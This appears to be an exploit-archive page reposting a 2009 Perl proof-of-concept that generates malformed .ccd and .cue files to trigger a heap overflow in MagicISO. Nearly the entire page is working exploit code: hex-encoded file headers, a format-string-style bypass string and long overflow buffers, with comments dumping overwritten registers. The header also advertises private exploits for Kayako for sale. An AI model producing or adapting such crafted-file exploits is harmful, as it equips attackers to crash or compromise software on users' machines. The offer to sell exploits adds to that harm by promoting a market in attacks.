Home / os / win10

magiciso-overflow.txt

Posted on 16 April 2009

#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit Poc
# ----------------------------------------------------------------
# Mountassif Moad
# Stack ..
# Cyber-Zone ..
#
# Private exploits for Kayako, contact me if anyone want buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-'
# Regiter for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Rgister for cue
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBc overwrited 41
# ESP 0012F4D8
# EBP 0012F4E4
# ESI 00001200
# EDI 00000000
# EIP 0047FE91 MagicISO.0047FE91
# Crash
sub help {print "[!] usage :   
    perl $0 .cpp 
    perl $0 .cue 
  " ;exit();}
&help
unless $ARGV[0];
my $xpl = $ARGV[0];
my $header =
"x5Bx43x6Cx6Fx6Ex65x43x44x5Dx0Dx0Ax56x65x72x73x69".
"x6Fx6Ex3Dx33x0Dx0Ax5Bx44x69x73x63x5Dx0Dx0Ax54x6F".
"x63x45x6Ex74x72x69x65x73x3Dx34x0Dx0Ax53x65x73x73".
"x69x6Fx6Ex73x3Dx31x0Dx0Ax44x61x74x61x54x72x61x63".
"x6Bx73x53x63x72x61x6Dx62x6Cx65x64x3Dx30x0Dx0Ax43".
"x44x54x65x78x74x4Cx65x6Ex67x74x68x3Dx30x0Dx0Ax5B".
"x53x65x73x73x69x6Fx6Ex20x31x5Dx0Dx0Ax50x72x65x47".
"x61x70x4Dx6Fx64x65x3Dx31x0Dx0Ax50x72x65x47x61x70".
"x53x75x62x43x3Dx30x0Dx0Ax5Bx45x6Ex74x72x79x20x30".
"x5Dx0Dx0Ax53x65x73x73x69x6Fx6Ex3Dx31x0Dx0Ax50x6F".
"x69x6Ex74x3Dx30x78x61x30x0Dx0Ax41x44x52x3Dx30x78".
"x30x31x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3Dx30x78x30x34".
"x0Dx0Ax54x72x61x63x6Bx4Ex6Fx3Dx30x0Dx0Ax41x4Dx69".
"x6Ex3Dx30x0Dx0Ax41x53x65x63x3Dx30x0Dx0Ax41x46x72".
"x61x6Dx65x3Dx30x0Dx0Ax41x4Cx42x41x3Dx2Dx31x35x30".
"x0Dx0Ax5Ax65x72x6Fx3Dx30x0Dx0Ax50x4Dx69x6Ex3Dx31".
"x0Dx0Ax50x53x65x63x3Dx30x0Dx0Ax50x46x72x61x6Dx65".
"x3Dx30x0Dx0Ax50x4Cx42x41x3Dx34x33x35x30x0Dx0Ax5B".
"x45x6Ex74x72x79x20x31x5Dx0Dx0Ax53x65x73x73x69x6F".
"x6Ex3Dx31x0Dx0Ax50x6Fx69x6Ex74x3Dx30x78x61x31x0D".
"x0Ax41x44x52x3Dx30x78x30x31x0Dx0Ax43x6Fx6Ex74x72".
"x6Fx6Cx3Dx30x78x30x34x0Dx0Ax54x72x61x63x6Bx4Ex6F".
"x3Dx30x0Dx0Ax41x4Dx69x6Ex3Dx30x0Dx0Ax41x53x65x63".
"x3Dx30x0Dx0Ax41x46x72x61x6Dx65x3Dx30x0Dx0Ax41x4C".
"x42x41x3Dx2Dx31x35x30x0Dx0Ax5Ax65x72x6Fx3Dx30x0D".
"x0Ax50x4Dx69x6Ex3Dx31x0Dx0Ax50x53x65x63x3Dx30x0D".
"x0Ax50x46x72x61x6Dx65x3Dx30x0Dx0Ax50x4Cx42x41x3D".
"x34x33x35x30x0Dx0Ax5Bx45x6Ex74x72x79x20x32x5Dx0D".
"x0Ax53x65x73x73x69x6Fx6Ex3Dx31x0Dx0Ax50x6Fx69x6E".
"x74x3Dx30x78x61x32x0Dx0Ax41x44x52x3Dx30x78x30x31".
"x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3Dx30x78x30x34x0Dx0A".
"x54x72x61x63x6Bx4Ex6Fx3Dx30x0Dx0Ax41x4Dx69x6Ex3D".
"x30x0Dx0Ax41x53x65x63x3Dx30x0Dx0Ax41x46x72x61x6D".
"x65x3Dx30x0Dx0Ax41x4Cx42x41x3Dx2Dx31x35x30x0Dx0A".
"x5Ax65x72x6Fx3Dx30x0Dx0Ax50x4Dx69x6Ex3Dx30x0Dx0A".
"x50x53x65x63x3Dx32x0Dx0Ax50x46x72x61x6Dx65x3Dx33".
"x34x0Dx0Ax50x4Cx42x41x3Dx33x34x0Dx0Ax5Bx45x6Ex74".
"x72x79x20x33x5Dx0Dx0Ax53x65x73x73x69x6Fx6Ex3Dx31".
"x0Dx0Ax50x6Fx69x6Ex74x3Dx30x78x30x31x0Dx0Ax41x44".
"x52x3Dx30x78x30x31x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3D".
"x30x78x30x34x0Dx0Ax54x72x61x63x6Bx4Ex6Fx3Dx30x0D".
"x0Ax41x4Dx69x6Ex3Dx30x0Dx0Ax41x53x65x63x3Dx30x0D".
"x0Ax41x46x72x61x6Dx65x3Dx30x0Dx0Ax41x4Cx42x41x3D".
"x2Dx31x35x30x0Dx0Ax5Ax65x72x6Fx3Dx30x0Dx0Ax50x4D".
"x69x6Ex3Dx30x0Dx0Ax50x53x65x63x3Dx32x0Dx0Ax50x46".
"x72x61x6Dx65x3Dx30x0Dx0Ax50x4Cx42x41x3Dx30x0Dx0A".
"x5Bx54x52x41x43x4Bx20x31x5Dx0Dx0Ax4Dx4Fx44x45x3D".
"x31x0Dx0Ax49x4Ex44x45x58x20x31x3Dx39x39x39";


my $header1=
"x46x49x4cx45x20x22";
my $header2=
"x2ex42x49x4ex22x20x42x49x4ex41x52x59x0dx0ax20".
"x54x52x41x43x4bx20x30x31x20x4dx4fx44x45x31x2fx32".
"x33x35x32x0dx0ax20x20x20x49x4ex44x45x58x20x30x31".
"x20x30x30x3ax30x30x3ax30x30";

my $bypass=
"x39x39x39x41x78x25x4ex25x4ex25x4ex25x4ex25x4ex25".
"x4ex25x4ex25x4ex25x4ex25x4ex25x4ex25x25x4ex25x4e".
"x25x4ex25x4ex41x63x66x63x64x32x30x38x34x39x35x64".
"x35x36x35x65x66x36x36x65x37x64x66x66x39x66x39x38".
"x37x36x34x64x61x63x34x63x61x34x32x33x38x61x30";
my $edx = "x43x43x43x43";
my $Bof = "x41" x 4004;
my $eax = "x44x44x44x44";
my $Nop = "x90" x 4;
my $ecx = "x45x45x45x45";
my $Sop = "x91" x 20;
my $Hof = "x46" x 5000;

if ($xpl eq '.ccd')
{open(file,'>Exploit.ccd');print file $header.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof;close(file);print "[!] Done 
";}
elsif ($xpl eq '.cue')
{open(file,'>Exploit.cue');print file $header1.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof.$header2;close(file);print "[!] Done 
"}
else {&help}

 

TOP

Malware :

Exploits :